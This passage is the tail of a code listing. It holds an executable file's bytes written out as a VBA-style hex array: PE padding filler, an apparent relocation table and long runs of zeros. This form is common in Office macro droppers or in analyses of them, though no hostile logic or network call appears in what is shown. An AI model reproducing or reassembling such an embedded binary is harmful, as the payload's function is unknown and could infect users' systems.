p;H4E&amp;H47&amp;H50&amp;H41&amp;H44&amp;H44&amp;H49&amp;H4E&amp;H47&amp;H58&amp;H58&amp;H50&amp;H41&amp;H44&amp;H44&amp;H49&amp;H4E&amp;H47&amp;H50&amp;H41&amp;H44&amp;H44&amp;H49&amp;H4E&amp;H47&amp;H58&amp;H58&amp;H50&amp;H41&amp;H44&amp;H44&amp;H49&amp;H4E&amp;H47&amp;H50&amp;H41&amp;H44&amp;H44&amp;H49&amp;H4E&amp;H47&amp;H58&amp;H58&amp;H50&amp;H41&amp;H44&amp;H00&amp;H10&amp;H00&amp;H00&amp;H30&amp;H01&amp;H00&amp;H00&amp;H0A&amp;H30&amp;H1B&amp;H30&amp;H8F&amp;H30&amp;H96&amp;H30&amp;HA3&amp;H30&amp;HBE&amp;H30&amp;HCC&amp;H30&amp;HD6&amp;H30&amp;HDD&amp;H30&amp;HE3&amp;H30&amp;HE8&amp;H30&amp;HED&amp;H30&amp;HF2&amp;H30&amp;HF7&amp;H30&amp;HFD&amp;H30&amp;H05&amp;H31&amp;H19&amp;H31&amp;H26&amp;H31&amp;H33&amp;H31&amp;H47&amp;H31&amp;H50&amp;H31&amp;H6B&amp;H31&amp;H75&amp;H31&amp;H88&amp;H31&amp;H92&amp;H31&amp;H97&amp;H31&amp;H9C&amp;H31&amp;HBE&amp;H31&amp;HC3&amp;H31&amp;HCC&amp;H31&amp;HD1&amp;H31&amp;HDE&amp;H31&amp;HEF&amp;H31&amp;HF5&amp;H31&amp;HFC&amp;H31&amp;H10&amp;H32&amp;H15&amp;H32&amp;H1B&amp;H32&amp;H23&amp;H32&amp;H29&amp;H32&amp;H2F&amp;H32&amp;H3C&amp;H32&amp;H42&amp;H32&amp;H4B&amp;H32&amp;H6A&amp;H32&amp;H72&amp;H32&amp;H7B&amp;H32&amp;H81&amp;H32&amp;H89&amp;H32&amp;H95&amp;H32&amp;HA7&amp;H32&amp;HB2&amp;H32&amp;
HB8&amp;H32&amp;HCA&amp;H32&amp;HD2&amp;H32&amp;HDD&amp;H32&amp;HE9&amp;H32&amp;HEF&amp;H32&amp;HF8&amp;H32&amp;HFE&amp;H32&amp;H03&amp;H33&amp;H08&amp;H33&amp;H0D&amp;H33&amp;H14&amp;H33&amp;H1A&amp;H33&amp;H2C&amp;H33&amp;H34&amp;H33&amp;H3A&amp;H33&amp;H46&amp;H33&amp;H51&amp;H33&amp;H6F&amp;H33&amp;H75&amp;H33&amp;H7B&amp;H33&amp;H81&amp;H33&amp;H87&amp;H33&amp;H8D&amp;H33&amp;H94&amp;H33&amp;H9B&amp;H33&amp;HA2&amp;H33&amp;HA9&amp;H33&amp;HB0&amp;H33&amp;HB7&amp;H33&amp;HBE&amp;H33&amp;HC6&amp;H33&amp;HCE&amp;H33&amp;HD6&amp;H33&amp;HE2&amp;H33&amp;HEB&amp;H33&amp;HF0&amp;H33&amp;HF6&amp;H33&amp;H00&amp;H34&amp;H09&amp;H34&amp;H14&amp;H34&amp;H20&amp;H34&amp;H25&amp;H34&amp;H35&amp;H34&amp;H3A&amp;H34&amp;H40&amp;H34&amp;H46&amp;H34&amp;H5C&amp;H34&amp;H63&amp;H34&amp;HAC&amp;H34&amp;HB2&amp;H34&amp;HBC&amp;H34&amp;HC3&amp;H34&amp;HCE&amp;H34&amp;HD4&amp;H34&amp;HE7&amp;H34&amp;HFC&amp;H34&amp;H07&amp;H35&amp;H1D&amp;H35&amp;H35&amp;H35&amp;H3F&amp;H35&amp;H7C&amp;H35&amp;H81&amp;H35&amp;HA2&amp;H35&amp;HA7&amp;H35&amp;HC6&amp;H35&amp;H68&amp;H36&amp;H6D&amp;H36&amp;H7F&amp;H36&amp;H9D&amp;H36&amp;HB1&amp;H36&amp;HB7&amp;H36&amp;H1E&amp;H37&amp;H24&amp;H37&amp;H31&amp;H37&amp;H4E&amp;H37&amp;H9B&amp;H37&amp;HA0&amp;H37&amp;HE2&amp;H37&amp;H05&amp;H38&amp;H12&amp;H38&amp;H1E&amp;H38&amp;H26&amp;H38&amp;H2E&amp;H38&amp;H3A&amp;H38&amp;H63&amp;H38&amp;H6B&amp;H38&amp;H76&amp;H38&amp;H7C&amp;H38&amp;H82&amp;H38&amp;H88&amp;H38&amp;H8E&amp;H38&amp;H94&amp;H38&amp;H9A&amp;H38&amp;HA0&amp;H38&amp;HA6&amp;H38&amp;H00&amp;H20&amp;H00&amp;H00&amp;H20&amp;H00&amp;H00&amp;H00&amp;HB4&amp;H30&amp;HC0&amp;H30&amp;HC4&amp;H30&amp;HEC&amp;H30&amp;HF0&amp;H30&amp;H7C&amp;H31&amp;H80&amp;H31&amp;H1C&amp;H32&amp;H20&amp;H32&amp;H40&amp;H32&amp;H5C&amp;H32&amp;H60&amp;H32&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00
&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00
</code></pre>
:ET